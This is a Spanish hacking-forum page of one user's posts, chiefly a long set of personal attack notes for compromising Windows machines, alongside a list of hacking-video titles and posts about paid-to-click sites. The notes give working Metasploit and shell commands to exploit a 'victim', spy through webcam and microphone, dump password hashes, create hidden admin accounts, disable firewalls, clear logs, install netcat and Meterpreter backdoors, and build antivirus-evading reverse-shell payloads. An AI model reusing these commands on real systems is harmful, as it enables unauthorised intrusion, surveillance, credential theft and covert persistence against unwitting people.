elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 [10]
91  Seguridad Informática / Hacking / Re: propuesta backtrack 5 r2 en: 30 Julio 2012, 06:16 am
No se cuanto te sirva pero quizas esta sea la base; puedes buscar en youtube los siguientes video los cuales puedes descagar con jdownloader.
Y te recomiendo instalar una maquina virtual para hacer pruebas, a mi me va muy bien con virtualbox.

En el foro de bactrack habia un documento muy bueno y bien elavorado que se llamaba de cracking guide o algo parecido realmente muy bueno deberias buscarlo aunque ultimamente el enlace al pdf ya esta roto.

Otro muy interesante era sobre hacer cluster para poner a funcionar john the ripper.

Tambien quizas no tan bueno puedes buscar en este foro mi publicacion de anotaciones quizas saques algo util de ahi.

Te recomiendo que tambien le eches un ojo a:
http://jhyx4life.blogspot.com/2009/11/metasploit-unleashed-en-espanol.html


Algunos videos de youtube a consultar:
armitage hacking Backtrack 5 r2
asleap _ THC-pptp-bruter
Auto Wifi Hacking (AirPwn in HackPack 1.2) Backtrack 5R2
BackTrack 101 pwn - Small Intro
Backtrack 5 - Adding Users & Using xhost
Backtrack 5 - Automated WEP Cracking with Gerix
Backtrack 5 - Crack md5 hash with John the ripper
Backtrack 5 - Crack WPA on a WPS AP using Reaver
Backtrack 5 - Email Collector
BackTrack 5 - metasploit - xpsp3
Backtrack 5 - WIFI Attack WPA2
Backtrack 5 - Wireless Compatiblity & Testing Injection
Backtrack 5 ARM on Droid Incredible
 backtrack 5 auto svn update
BackTrack 5 Backdooring Windows 7 [Tutorial]
BackTrack 5 claves wep con Filtrado MAC (HD)
BackTrack 5 claves WPA (HD) Part 1
 BackTrack 5 Fast-Track Tutorial Espa¤ol [SPELINAX]
Backtrack 5 Gnome - chkrootkit and rkhunter
 Backtrack 5 Gnome - HexEdit
BackTrack 5 KDE Login GUI, Boot Splash, wallpaper for dummies
BackTrack 5 KDE Show off
Backtrack 5 Killing Antivirus
backtrack 5 metasploit webcam shenanigans
BackTrack 5 metasploit_db_autopwn
BackTrack 5 Meterpreter 101 part_1 - Privledge Escalation & Keylogging
Backtrack 5 MySQL Database Setup
BackTrack 5 netcat backdoor
Backtrack 5 on Android using Debdroid (Works on ALL rooted devices)
Backtrack 5 r1 - Compiz Desktop Special Effects
BackTrack 5 R1 - Running Tor in Root
Backtrack 5 R1 Ettercap DNS Spoof Configuration
BackTrack 5 R1 SQL Injection By Hack X.404
Backtrack 5 R2 Released
Backtrack 5 R2-Sniff SSL https passwords
BackTrack 5 running on Android Phone
Backtrack 5 running on Android
Backtrack 5 Social Engineering toolkit tutorial- hack windows
Backtrack 5 Tutorial - Lanmap2
Backtrack 5 tutorial Armitage 1_2
BackTrack 5 Wordlists 101 _ crunch
Backtrack 5R2 EtherApe snip_tutorial
Backtrack 5R2 HackPack v1.2 Release
Backtrack 5R2 How To Hack Win 7 With Armitage
Backtrack 5R2 SSL Strip & Ettercap (Fix and Tutorial)
Backtrack 5R2 using HackPack
Backtrack 5r2 Wordlist Centre (HackPack)
Backtrack 5_ Metasploit attack on Windows 7 32 and 64 bit
BackTrack 5_ Using Metasploit to Hack computers.
Backtrack Cracking MD5
Backtrack Installer 2.0 - (backtrack 5 running on android)
Backtrack Installer 2.0 - (backtrack 5 running on android)
Backtrack Series - 5_ Cracking WPA Protected Network Using ASCII Dictionary Attack
Basic_ Small Introduction to backtrack 5
Buffer Overflow por inyecci¢n del ShellCode usando CYMOTHOA del BACKTRACK 5 R2
Bypass Windows 8 login - With Backtrack 5 R2 Gnome
China Web Server's Hacking With Armitage On Backtrack
Clave WPA-psk sin diccionario (john the ripper) (HD)
Como Evitar Ataques a Redes WiFi con Backtrack Wifislax Wifiway [Aircrack]
Como obtener claves wifi con backtrack 5
Crack WEP con Backtrack (HD)
Crack Wireless WEP con BackTrack 5
Crack WPA & WPA2 Backtrack (HD)
Cracking Windows 7 password using Backtrack 4 Live CD
Cracking WPA_WPA2 Network Keys in Backtrack 5 [Aircrack-ng]
Credential Harvester Attack Method- SET Backtrack 5 Tutorial
CWM root
db_autopwn using postgresql in backtrack 5
descifrar claves wifi seguridad wep con Backtrack 5 r2 - tutorial en espa¤ol parte 1
Detecting intruders in your network with backtrack
cifrar Backdoor en BackTrack 5 [SPELINAX]
Explotando Vulnerabilidad de MS12-020 Con Backtrack y Programa para Windows
fakeAP_pwn-v0.3.mp4
Hack any Windows Computer Using BackTrack 5 R2
Hack Facebook_ Backtrack 5, Gerix wifi cracker, SET, DNS Poisoning
Hack Windows using Nessus and Metasploit Backtrack 5 Tutorial
Hackear red de internet con BACKTRACK 5
Hackear Red Inal mbrica wep con Backtrack 5 R2 - inf¡nitum 6 y 4 d¡gitos - cualquier modem - 2012
Hackear Red Inal mbrica wep con filtrado mac - Backtrack 5 R1 - 2012
Hacker 100% - BackTrack 5 ( Facebook - Hotmail - Dofus ... )T Tutorial By Reda Bousserhane - HD
Hacking and defacing web site on BackTrack 5 r2
Hacking Website Database with SQLmap in Backtrack 5
Hacking Windows 7 con Backtrack
Hacking Windows 7 with Backtrack
How to boot Backtrack 5 on Android phone
How To Crack WPA2 [Backtrack 5 _ Aircrack]
How To Hack a WebSite Using BackTrack 5 {SqlMap}
How to hack into windows 7 [priv escalate]
How to Hack wep key with Backtrack 5 in 2 minutes
How to have internet Backtrack 5 , Windows XP with VMware (Bridged)
How to install BackTrack 5 R2
How to Install Network Manager and Run a VPN Through Backtrack 5 - BT5 Episode #2
How to Run Backtrack 5 on Android
How to Steal Passwords with Ettercap using Backtrack Linux
How to use aircrack in backtrack 5 with a WPA WPA2 capture
Hydra
Install internet on backtrack using usb modem or mobile phone or data card
Installing iwScanner on Backtrack 5
Katana (OphCrack & Backtrack 5)
Metasploit Tutorial on Backtrack 5 R1 to Hack Linux
Metasploit Vs Adobe PDFs
Owning Windows - XP SP3 Vs. file_autopwn
Owning Windows - XP SP3 Vs. Squid
Part 2_ Attacking The Access Point
Pentesting With Backtrack 5 - Windows 7 Password Reset
Pentesting With Backtrack 5 - Windows 7 Password Reset
Phishing with Backtrack 5 R1
Reaver 1.4   Backtrack 5R2
Removing Windows User Password (BT5 R1)
Reset Passwords on Windows XP and Vista using Backtrack 4 - Captions and Voice Included
Setting up a Network Connection in Linux (Backtrack)
Setup Nessus on Backtrack 5
Spying the network with Backtrack 5
SSLStrip
Using Armitage & Metasploit on BackTrack 5
Using Metasploit on BackTrack 5 (Windows XP Exploit)
VPN in BackTrack 5 with Network Manager
Wardrive with Backtrack 5 and Android Phone GPS using Kismet
WEP - ARP - Client
Wi-Fi Connection for Backtrack - For New Bie's
wiffy_v0.1
Wireless Sniffing with Wireshark (Backtrack 5 R2)
Wordpress Vulnerability - BackTrack 5
WPA2 - Aircrack-ng vs Cowpatty
WPA2 - airolib-ng [Hidden SSID]
[Backtrack] Cracking zip passwords using fcrackzip
[How-To] Install Backtrack 5 ARM on Droid Incredible (Part 1)
[How-To] Install Backtrack 5 ARM on Droid Incredible (Part 2)   Metasploit Demo on the Incredible

Good Luck
92  Seguridad Informática / Hacking / Re: Sitios PTC en: 30 Julio 2012, 05:16 am
Gracias por contestar al menos uno, ok creo que apoyo que prefieras el FTC jajajaja no pretendo ganar reffers mas bien necesitaba que me dijeran  que http://www.bigmoneyptc.com/ es un PTC SCAM me llamo mucho la atencion de la diferencia de dinero con respecto a otros como http://www.buxcraft.com/ y https://www.clixsense.com/. Mi objetivo principal es de orientacion, que me recomendaran sitios de PTC asi como tips para subir rapido porque realmente hasta donde he visto el PTC no merece la pena casi lo dejo. Solo queria curiosar si alguien de aqui tiene mejores experiencias. De todas maneras como soy newbie en el tema por lo menos empece con una cuenta paypal con 0 usd.
De veras gracias man por responder y a todos aquellos que me dedican un segundo aunque sea para leerme. De todas maneras si fueramos un equipo y tu mi reffers seguro te daria un porciento, pero deberiamos organizarnos.

Saludos

Viva el free to click jajaja que ocurrente. ;D
93  Seguridad Informática / Hacking / Sitios PTC en: 22 Julio 2012, 23:46 pm
Ok me imagino que casi todos los que lean ya sepan de que va el PTC (paid to click)
Algunos de los sitios en que ya estoy.
http://www.awsurveys.com/
http://www.bigmoneyptc.com/
http://www.ganardineroreal.com/
http://kiclicks.com/
https://www.clixsense.com/
http://www.buxcraft.com/
http://www.ptcbox.com/
http://www.justbeenpaid.com/

Lista de algunos falsos
http://10dolares.traviesus.com/?p=37

En fin llevo poco dias en el desarrollo y deseo saber o debatir con ustedes formas legales de introducir dinero en una cuenta paypal recien creada en blanco.

En fin agradeceria cualqueir recomendacion para subir un poco mas rapido porqque creo que solo con los PTC tendre que destinar mi primer cobro a comprar un nuevo mouse jajajaja.

Saludos

Bueno cualquier recomendacion para meter dinero en una cuenta paypal es bien venida aca.
94  Seguridad Informática / Hacking / Anotaciones en: 22 Julio 2012, 23:37 pm
Bueno a todos los de este excelente sitio me gustaria compartir con ustedes partes de las anotaciones que ha generado horas de tutorial, video tutoriales, foros etc.
Espero le sea de su agrado, 100% modificable libre, la pueden mejorar, debatir con los demas en fin como todos los demas no me hago resposanble de mal uso de la informacion. Asi que confio en que la sepan usar bien  ;D.
Cualquier coincidencia con los ip es pura coincidecia siempre me ha dado trabajo algunos man de linux los cuales a veces no viene con muchos ejemplos, lo cual retrasa el uso de los comandos pero aun asi siguien siendo lo maximo.
En fin good luck.



*******************************************************************************
*******************************************************************************
Perfeccionamiento de la técnica de hackeo.

Cerciorarse que no tiene KAV.
msf > db_nmap 10.10.0.4 -p 1110

-------------------------------------------------------------------------------
  • Nmap: 1110/tcp closed nfsd-status
-------------------------------------------------------------------------------

Conociendo a nuestra víctima.
msf > db_nmap -T5 -A -v 10.10.0.4

-------------------------------------------------------------------------------
Nmap: Discovered open port 445/tcp on 10.10.0.4
  • Nmap: Discovered open port 139/tcp on 10.10.0.4
  • Nmap: Discovered open port 135/tcp on 10.10.0.4
  • Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
  • Nmap: 139/tcp open  netbios-ssn
  • Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
  • Nmap: Running (JUST GUESSING): Microsoft Windows XP|2003|2000|PocketPC/CE|Me (98%), Microsoft embedded (94%), Juniper Windows 2000 (94%)
-------------------------------------------------------------------------------

Lanzar todos los exploit conocidos a los puertos abiertos con conexión reversa.
La víctima se conecta a nosotros no nosotros a la víctima

msf > db_autopwn -t -e -r -p

Interactuando con la session 1 creada en la víctima.
msf > sessions -i 1

Saber que está haciendo nuestra víctima.
msf > screenshot

Conocer que Procesos está corriendo.
msf > ps

Detectar si tiene webcam.
msf > webcam_list

Tirarle una foto a la víctima si tiene webcam.
msf > webcam_snap 1

Grabar audio del micrófono la víctima.
msf > record_mic

Descargando los hash de los usuarios de la máquina.
msf > hashdump

--------------------------------------------------------------------------------------
Administrador:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
--------------------------------------------------------------------------------------

Pasar a CMD.
msf > execute -f cmd.exe -i -c -H

Ocultar de la pantalla de inicio el usuario que vamos a crear.
c:\windows\system32> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v loko /t REG_DWORD /d 00000000

Parar Centro de Seguridad.
c:\windows\system32> sc stop wscsvc

Deshabilitar Centro de Seguridad.
c:\windows\system32> sc config wscsvc start= disabled

Parar Firewall de Windows.
c:\windows\system32> sc stop sharedaccess

Deshabilitar Firewall de Windows.
c:\windows\system32> sc config sharedaccess start= disabled

Habilitar Telnet.
c:\windows\system32> sc config tlntsvr start= auto

Iniciar Telnet.
c:\windows\system32> sc start tlntsvr

Conociendo detalles de la víctima.
c:\windows\system32> systeminfo

-------------------------------------------------------------------------------
Nombre de host:                            JACK-PC
Nombre del sistema operativo:              Microsoft Windows XP Professional
Versión del sistema operativo:             5.1.2600 Service Pack 3 Compilaci?n 2600
Fabricante del sistema operativo:          Microsoft Corporation
Configuración del sistema operativo:       Estación de trabajo independiente
Tipo de compilación del sistema operativo: Uniprocessor Free
Propiedad de:                              Jack
Organización registrada:                   Home
Id. del producto:                          55274-640-8365391-23962
Fecha de instalación original:             18/07/2011, 23:02:38
Tiempo de actividad del sistema:           0 días, 0 horas, 49 minutos, 35 segundos
Fabricante del sistema:                    innotek GmbH
Modelo el sistema:                         VirtualBox
Tipo de sistema:                           X86-based PC
Procesador(es):                            1 Procesadores instalados.
                                           [01]: x86 Family 6 Model 15 Stepping 13 GenuineIntel ~438 Mhz
Versión del BIOS:                          VBOX   - 1
Directorio de Windows:                     C:\WINDOWS
Directorio de sistema:                     C:\WINDOWS\system32
Dispositivo de inicio:                     \Device\HarddiskVolume1
Configuración regional del sistema:        0c0a
Idioma:                                    0000040A
Zona horaria:                              N/D
Cantidad total de memoria física:          255 MB
Memoria física disponible:                 150 MB
Memoria virtual: tamaño máximo:            2.048 MB
Memoria virtual: disponible:               2.008 MB
Memoria virtual: en uso:                   40 MB
Ubicación(es) de archivo de paginación:    C:\pagefile.sys
Dominio:                                   GRUPO_TRABAJO
Servidor de inicio de sesión:              N/D
Revisión(es):                              1 revisión(es) instaladas.
                                           [01]: Q147222
Tarjeta(s) de red:                         1 Tarjetas de interfaz de red instaladas.
                                           [01]: Adaptador Ethernet PCI AMD PCNET Family
                                                 Nombre de conexión: Conexión de Área local
                                                 DHCP habilitado:    No
                                                 Direcciones IP
                                                 [01]: 10.10.0.4
-------------------------------------------------------------------------------

Conociendo su configuración IP para ver si usa puerta de enlace.
c:\windows\system32> ipconfig

-------------------------------------------------------------------------------
Configuración IP de Windows
Adaptador Ethernet Conexión de ?rea local          :
        Sufijo de conexión específica DNS :
        Dirección IP. . . . . . . . . . . : 10.10.0.4
        Máscara de subred . . . . . . . . : 255.255.255.0
        Puerta de enlace predeterminada   : 10.10.0.1
-------------------------------------------------------------------------------

Conocer si usa proxy.
HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Internet Setting

-------------------------------------------------------------------------------
ProxyServer 192.168.0.1:8080
-------------------------------------------------------------------------------

Conocer recursos compartidos.
c:\windows\system32> net share

-------------------------------------------------------------------------------
Nombre       Recurso                       Descripción
-------------------------------------------------------------------------------
ADMIN$       C:\WINDOWS                      Admin remota                      
C$           C:\                             Recurso predeterminado            
IPC$                                         IPC remota                        
Se ha completado el comando correctamente.
------------------------------------------------------------------------------

Crear usuario.
c:\windows\system32> net user loko loko /add

Agregarlo al grupo de administradores.
c:\windows\system32> net localgroup administradores loko /add

Montando recursos compartidos en nuestro explorer.
Nota: Ojo este comando es en el CMD de nuestra PC no en Mestaploit.
Win+R
cmd

C:\Users\REDES> net use z: \\10.10.0.4\c$
-----------------------------------------------------------------------------
Escriba el nombre de usuario para "10.10.0.4": loko
Escriba la contraseña para 10.10.0.4: loko
Se ha completado el comando correctamente.
-----------------------------------------------------------------------------
Win+E

Una vez terminado podemos hacer click derecho desconectar o volver a CMD de nuestra PC no en Mestaploit .
C:\Users\REDES> net use z: /delete

Volvemos a Metasploit.

Saliendo de CMD.
c:\windows\system32> exit

Limpiar eventos de windows.
msf > clearev

Saliendo de meterpreter.
msf > kill

Cualquier contratiempo siga leyendo los Anexos y perfeccione su ataque.

*******************************************************************************
*******************************************************************************
Esto puede evitar algunos problemas.
Los espacios equivalen a %20 y  %2B equivale a un "+"

*******************************************************************************
*******************************************************************************
En Debian los comandos ettercap y john funcionan bajo sudo.
$sudo ettercap -C
$sudo john

*******************************************************************************
*******************************************************************************
Conocer procesos remotos:
C:\>tasklist /S 10.1.8.123 /u redes /p qwerty12345

Parar procesos remotos:
C:\>taskkill /S 10.1.8.123 /u redes /p qwerty12345 /PID 196

*******************************************************************************
*******************************************************************************
Hydra se usa para crackear SMB.
$./hydra -L users.txt -P passwords.txt example.com ftp

*******************************************************************************
*******************************************************************************
Sniffer de metasploit captura hash de conexiones hacia la PC atacante.

msf >use smb_sniffer
msf smb_sniffer > set PWFILE=/tmp/pwtest.txt

*******************************************************************************
*******************************************************************************
Generar Worldlist con John the Ripper.
2 Caracteres todas las combinaciones posibles.
$john -stdout=2 -incremental > /home/intrude/Worldlist.txt
ó
$john -stdout=2 -i > /home/intrude/Worldlist.txt

2 Caracteres todas las letras minúsculas.
$john -stdout=2 -i=alpha > /home/intrude/Worldlist.txt

2 Caracteres todos los números.
$john -stdout=2 -i=digits > /home/intrude/Worldlist.txt

2 Caracteres todas las letras minúsculas y los números.
$john -stdout=2 -i=alnum > /home/intrude/Worldlist.txt

Ojo:
Todo los password ya crackeados en la pc se acumulan en john.pot .
*******************************************************************************
*******************************************************************************
Hacer una lista de caracteres personalizada para generar Worldlist.txt con
John the Ripper.

Se debe crackear un hash primero por ejemplo.
/home/intrude/.john/hash.txt
-----------------------------------------------------------------------------
Administrador:500:b757bf5c0d87772faad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
-----------------------------------------------------------------------------
$sudo john hash.txt

Una vez hallado el password 1234 vamos a
$cd /usr/share/john

Para tener todos los *.chr juntos.
Luego hacemos un custom.chr que contenga solo 1234.
$sudo john --make-charset=custom.chr /home/intrude/.john/hash.txt

Editamos la connfiguracion de john para poder hacer un incremento de nuestro
custom.chr
$sudo gedit /etc/john/john.cfg
-----------------------------------------------------------------------------
[Incremental:Custom]
File = /usr/share/john/custom.chr
MinLen = 1
MaxLen = 8
CharCount = 4
#Caracteres adicionales y consideremos que ya tenemos 1234 en el custom.chr.
#Deberiamos hacer un hash con lo que consideremos que siempres estara.
#Porque al poner 1234 ya sabes que va estar en las combinaciones.
#Ahora que ya sabemos pienso que es mejor hacer un hash con " ".
Extra = abcdefghiklm
-----------------------------------------------------------------------------
Finalmente procedemos.
$john -stdout=2 -i=custom > /home/intrude/Worldlist.txt

Donde se nos creara un Worldlist.txt que contendrá un Len = 2 con todas las combinaciones posibles con los custom 1 2 3 4
más los caracteres declarado en Extra =

*******************************************************************************
*******************************************************************************
How to set static IP in Backtrack4
$nano /etc/network/interfaces
-----------------------------------------------------------------------------
auto lo
iface lo inet loopback
#Red cableada
auto eth0
 iface eth0 inet static
 address 192.168.0.100
 netmask 255.255.255.0
 network 192.168.0.0
 broadcast 192.168.0.255
 gateway 192.168.0.1
 
#Red inalámbrica
auto wlan0
 iface wlan0 inet static
 address 168.254.0.0
 netmask 255.254.0.0
   
#Red virtualbox
auto vboxnet0
 iface vboxnet0 inet static
 address 168.254.0.0
 netmask 255.254.0.0
-----------------------------------------------------------------------------
Si existe servidor dns:

$nano /etc/resolv.conf
-----------------------------------------------------------------------------
nameserver 192.168.0.1
-----------------------------------------------------------------------------

$/etc/init.d/networking start
o
$ifup eth0
ó
$ifconfig eth0 up

Si se hace cualquier cambio:
$/etc/init.d/networking restart

Para parar:
$/etc/init.d/networking stop
ó
$ifdown eth0
ó
$ifconfig eth0 down

*******************************************************************************
*******************************************************************************
Configurar Wifi en modo grafico.
$/etc/init.d/wicd start
ó
$start-network

*******************************************************************************
*******************************************************************************
Muestra los dispositivos inalámbricos disponibles para realizar el airmon-ng.
$airmon-ng
wlan0           Atheros         ath5k - [phy0]

*******************************************************************************
*******************************************************************************
Iniciar la wlan o pararla
$ifconfig wlan0 up
$ifconfig wlan0 down

*******************************************************************************
*******************************************************************************
Determinar puerto abiertos de una pc remotamente.
$nmap -vv 192.168.0.2

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1110/tcp  open  nfsd-status
3389/tcp  open  ms-term-serv
6002/tcp  open  X11:2
19780/tcp open  unknown
MAC Address: 00:18:F3:71:6C:68 (Asustek Computer)

*******************************************************************************
*******************************************************************************
Ettercap
$nano /etc/etter.conf

#---------------
#     Linux
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

*******************************************************************************
*******************************************************************************
Setting your IP manually

root@bt:~# ifconfig eth0 192.168.1.112/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

*******************************************************************************
*******************************************************************************
Wifi WEP

$startx
$/etc/init.d/networking start
$airmon-ng
$airmon-ng stop (interface)
$ifconfig (interface) down

Cambiar la mac de la wlan0 ("FakeMac") valido si quisiera hacerse para eth0
en fin cualquier interface.
$macchanger --mac 00:11:22:33:44:55 (interface)
$airmon-ng start (interface)

$airodump-ng (interface)
ctrl + c
$airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
$aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

ctrl + c
$airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
$aireplay-ng -1 0 -a [bssid] [wireless card name]
$aireplay-ng -3 b [bssid][wireless card name]
ctrl + c
dir
$aircrack-ng [filename]

*******************************************************************************
*******************************************************************************
Buscar un fichero.
$find  -name '*.rmvb'

*******************************************************************************
*******************************************************************************
Nmap.
$namp -sS -P0 -F -O -d -vv -T3                  KAV
$nmap 192.168.0.2                            KAV
$nmap -vv 192.168.0.2 -p 135                NoKAV
$nmap -vv 192.168.0.2 -p 135,445            NoKAV
$nmap -vv 192.168.0.2 -p 0-65535            KAV

Salvar los resultados de salidas de forma complensible.
$nmap -sF 10.10.10.1/24 -oN outfile

Mantener ocupado los NDIS
$nmap -sS 10.10.10.1 -D 192.168.0.1


Comando Nmap en aplicaciones de BackTrack4.
Intense Scan
msf > db_nmap -T5 -A -v 192.168.0.2              KAV
Quick Scan
msf > db_nmap -T5 -F 192.168.0.2               NoKAV
Quick Scan (OS Detect)
msf > db_nmap -sV -T5 -O -F --version-light 192.168.0.2 NoKAV

*******************************************************************************
*******************************************************************************
Normal Open Ports in Windows XP Sp2 Professional

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1110/tcp  open  nfsd-status                      KAV
3389/tcp  open  ms-term-serv

*******************************************************************************
*******************************************************************************
Crack rar zip 7z
root@bt:/pentest/passwords/rarcrack# ./rarcrack /media/ALAIN\ V/Password/Foto
s.zip --threads 12 --type zip

*******************************************************************************
*******************************************************************************
Obtener el SAM localmente con BT4.
$samdump2 /media/disk/WINDOWS/system32/config/system /media/disk/WINDOWS/system32/config/SAM >hash.txt

Cracking SAM con John the ripper.
$./john --format:NT hash.txt

*******************************************************************************
*******************************************************************************
Compilar c files.
$gcc -o mssmb_poc mssmb_poc.c

Ejecutar
$./mssmb_poc
*******************************************************************************
*******************************************************************************
Compilar c files con LCC32.
C:\lcc\bin>bin mssmb_poc.c
C:\lcc\bin>lcclnk mssmb_poc.obj
C:\lcc\bin>mssmb_poc

*******************************************************************************
*******************************************************************************
Habilitar Microsoft Terminal Server. Default Port: 3389.
C:\>reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "0"

*******************************************************************************
*******************************************************************************
Lista de últimos videos vistos en Media Player Classic.
HKEY_CURRENT_USER\Software\Gabest\Media Player Classic\Recent File List

*******************************************************************************
*******************************************************************************
Lista de últimos documentos vistos en Microsoft Word
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
  
*******************************************************************************
*******************************************************************************
Lista de máquinas a la cuales se le ha hecho Telnet.
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default

*******************************************************************************
*******************************************************************************
Transferir ficheros por tftp. Default Port:69.
PC del Atacante.
Abrir tftpd32.exe
Declarar Current Directory "C:\Temp"
Declarar Server Interface 10.10.0.1  (Ip del atacante)

PC Víctima.
PUT sube al Atacante notepad.exe a C:\Temp en el atacante.
C:\>tftp -i 10.10.0.1 PUT C:\Windows\notepad.exe

GET descarga del Atacante nc.exe el cual debe estar en C:\Temp ya que es nuestro Current Directory.
C:\>tftp -i 10.10.0.1 GET nc.exe

*******************************************************************************
*******************************************************************************
Copiar ficheros con nc.
En la víctima:
C:\>nc -v -l -p 1234 < C:\windows\notepad.exe
En el atacante:
C:\>nc -v 10.10.0.4 1234 > notepad.exe

Crear un proxy con nc.
Crear un proxy: Tan sencillo como : nc -l -p 2000 -c “nc host1 22”
C:\>nc -l -p 2000 -c “nc example.org 22”
C:\>ncat -v -l 1111 -c "ncat -l 2222"

Forward Proxy.
C:\>nc -w \ 20 192.168.1.10 80

Escanear con nc.
C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21 DNS fwd/rev mismatch: localhost != darkstar

Sniffer con nc.
C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23 DNS fwd/rev mismatch: localhost != darkstar listening on [any] 23 ... DNS fwd/rev mismatch: localhost != darkstar connect to [127.0.0.1] from localhost [127.0.0.1] 1131 login: sniffado password: jeje!!

Redirect a connection.
C:\>nc -l -p 1234 localhost 19080
C:\>nc -l -p 80 | nc localhost 3128

Redirect a connection.
C:\>nc -l -p 12345 | nc www.google.com 80

*******************************************************************************
*******************************************************************************
Pasar un servicio deshabilitado a habilitado (Telnet).
C:\>sc config tlntsvr start= auto

Restaurarlo.
C:\>sc config tlntsvr start= disabled

Iniciar un servicio.
C:\>sc start tlntsvr

*******************************************************************************
*******************************************************************************
Crear un servicio nuevo.
C:\>sc \\victima create svchost binPath= C:\WINDOWS\system\serviciosecreto.exe
C:\>sc \\victima start svchost

Otro.
C:\>sc \\victima create backdoor binpath= "cmd /C C:\nc.exe -dLp 6666 -e cmd.exe" type= own type= interact
C:\>sc \\victima start backdoor

C:\>sc create Network Connections Service binPath= “cmd /K start C:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore
C:\>sc create "Proxy" DisplayName= "MySQL Proxy" start= "auto" » binPath=
C:\>sc config NewService binpath= "ntsd -d C:\windows\system32\NewServ.exe"

Localmente.
C:\>sc create spooler binPath= "C:\WINDOWS\system32\spoolsv.exe"

Hacer que levante desde registro aunque se puede hacer desde el propio sc y es más under:
C:\>reg add \\victima\HKEY_LOCAL_MACHINE\software\microsoft\windows\CurrentVersion\Run\ /v Path / t REG_SZ /d C:\WINDOWS\system\serviciosecreto.exe

*******************************************************************************
*******************************************************************************
Conociendo hash de la Víctima
--------------------------------------------------------------------------------------
Administrador:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
--------------------------------------------------------------------------------------

Podemos usar PSExec de la siguiente forma:

msf > use windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/bind_tcp
msf exploit(psexec) > set RHOST 192.168.57.131
msf exploit(psexec) > set SMBUser administrador
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c

*******************************************************************************
*******************************************************************************
Esto es actualmente detectado por casi cualquier antivirus, pero el conocimiento nunca está de más.

Crear un payload ejecutable:
$./msfpayload windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/7.exe

Crear el mismo payload codificado con 3 enconder, 10 iteraciones el 1er encoder, 10 iteraciones el 2do encoder y 1 iteración el último encoder para un total de 21 iteración:
$./msfpayload windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe

Comprobar salida del ejecutable:
$file /tmp/6.exe

Conectarse al payload una vez ejecutado en la víctima:
$./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E

*******************************************************************************
*******************************************************************************
Meterpreter
Limpiar eventos de windows.
meterpreter >  clearev

Cargar modulo incógnito.
meterpreter >  use incognito

Hacernos pasar por un usuario existente después de haber cargado incógnito
meterpreter >  list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
SNEAKS.IN\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter >  impersonate_token SNEAKS.IN\\Administrator

Dejar servicio de Meterpreter como un BACKDOOR default port:31337
meterpreter > run metsvc

Nota: Para conectarse es necesario usar exploit multi/handler y el PAYLOAD windows/metsvc_bind_tcp correctamente configurado.

Ejecutar un programa por defecto estamos en C:\windows\system32\cmd.exe
meterpreter >  execute -f cmd.exe

Obtener lista de procesos de la pc víctima.
meterpreter >  ps

Parar un proceso en específico.
meterpreter >  kill PID
ó
meterpreter >  execute -f "taskkill /f /im cmd.exe"

Pasar de Meterpreter a CMD
meterpreter >  execute -f cmd.exe -i -c -H

Crear un usuario
meterpreter >  execute -f "net user loko loko /add"

Agregar un usuario al grupo de administradores
meterpreter >  execute -f "net localgroup administradores loko /add"

Ocultar el usuario loko de la pantalla de bienvenida
Mejor usar registro remoto.
meterpreter >  execute -f "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v loko /t REG_DWORD /d 00000000"

Toyanizar netcat después de meterpreter.
meterpreter >  upload /root/nc.exe C:\\WINDOWS\\SYSTEM32\\ OK!
